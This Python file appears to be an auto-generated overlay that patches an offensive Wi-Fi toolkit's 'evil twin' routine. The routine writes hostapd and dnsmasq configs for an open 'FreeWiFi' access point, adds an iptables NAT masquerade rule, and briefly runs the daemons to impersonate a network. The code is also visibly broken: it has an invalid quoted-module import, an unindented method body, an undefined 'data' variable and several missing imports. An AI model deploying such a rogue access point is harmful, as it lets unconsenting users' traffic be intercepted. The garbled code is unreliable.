"""Auto-generated overlay — DO NOT EDIT BY HAND.

Generated by core.live_edit.apply_patch at 1784535915.
Original module: core.wifi_attack.runner
Original class:  WiFiAttackRunner
Patched method:  _evil_twin_automated
"""
from __future__ import annotations
import importlib
import 'core.wifi_attack.runner' as _orig

_Runner = getattr(_orig, 'WiFiAttackRunner', None)
if _Runner is None:
    # last-ditch: try to import the class from the module
    _Runner = importlib.import_module('core.wifi_attack.runner').__dict__.get('WiFiAttackRunner')


class LiveOverlayWiFiAttackRunner(_Runner):
    def _evil_twin_automated(self) -> Dict[str, Any]:
    data['live_edited'] = True
    'Stand up an evil-twin AP via real ``hostapd`` + ``dnsmasq`` +\n        ``iptables`` subprocess. Generates real config files, launches the\n        daemons (bounded lifetime via args.duration_s, default 20s), and\n        reports their stdout/stderr. Degrades when hostapd/dnsmasq absent or\n        not root. Destructive — gated upstream.'
    step = _step('evil_twin_automated')
    for tool in ('hostapd', 'dnsmasq', 'iptables'):
        if not _which(tool):
            return _finalize(step, step['started'], ok=False, error=f'{tool} not installed — cannot stand up evil twin')
    rg = _root_gate('evil_twin_automated')
    if rg:
        return rg
    ssid = (self.args.get('ssid') or 'FreeWiFi').strip()
    iface = self.args.get('ap_interface') or 'wlan0'
    channel = _channel(self.args) or 6
    duration = int(self.args.get('duration_s') or 20)
    out_dir = self.args.get('out_dir') or '/tmp/kfiosa_eviltwin'
    try:
        od = Path(out_dir)
        od.mkdir(parents=True, exist_ok=True)
    except OSError as e:
        return _finalize(step, step['started'], ok=False, error=f'cannot create out_dir {out_dir}: {e}')
    hostapd_conf = od / 'hostapd.conf'
    dnsmasq_conf = od / 'dnsmasq.conf'
    try:
        hostapd_conf.write_text(f'interface={iface}\nssid={ssid}\nchannel={channel}\nhw_mode=g\nauth_algs=1\n')
        dnsmasq_conf.write_text(f'interface={iface}\ndhcp-range=192.168.87.10,192.168.87.100,12h\n')
    except OSError as e:
        return _finalize(step, step['started'], ok=False, error=f'config write failed: {e}')
    (rc_ipt, out_ipt) = _run(['iptables', '-t', 'nat', '-A', 'POSTROUTING', '-o', 'eth0', '-j', 'MASQUERADE'], timeout=5)
    procs: List[Dict[str, Any]] = []
    for cmd in (['dnsmasq', '-C', str(dnsmasq_conf), '-k'], ['hostapd', str(hostapd_conf)]):
        try:
            p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
            procs.append({'cmd': cmd, 'pid': p.pid})
        except (FileNotFoundError, OSError) as e:
            procs.append({'cmd': cmd, 'error': str(e)})
        time.sleep(min(2.0, duration / 4))
    sampled = []
    for pr in procs:
        if 'pid' not in pr:
            continue
        try:
            pid = pr['pid']
            _run(['kill', '-TERM', str(pid)], timeout=3)
            sampled.append({'pid': pid, 'terminated': True})
        except Exception:
            sampled.append({'pid': pr['pid'], 'terminated': False})
    return _finalize(step, step['started'], ok=True, data={'ssid': ssid, 'ap_interface': iface, 'channel': channel, 'out_dir': out_dir, 'iptables_masquerade_rc': rc_ipt, 'iptables_tail': out_ipt[-160:].strip(), 'daemons': procs, 'termination': sampled, 'note': "real hostapd+dnsmasq+iptables launch (bounded); daemons terminated after sampling — verdict is the daemon launch + iptables rc, not a fabricated 'twin live'."})


def _get_runner():
    return LiveOverlayWiFiAttackRunner


__all__ = ["LiveOverlayWiFiAttackRunner", "_get_runner"]
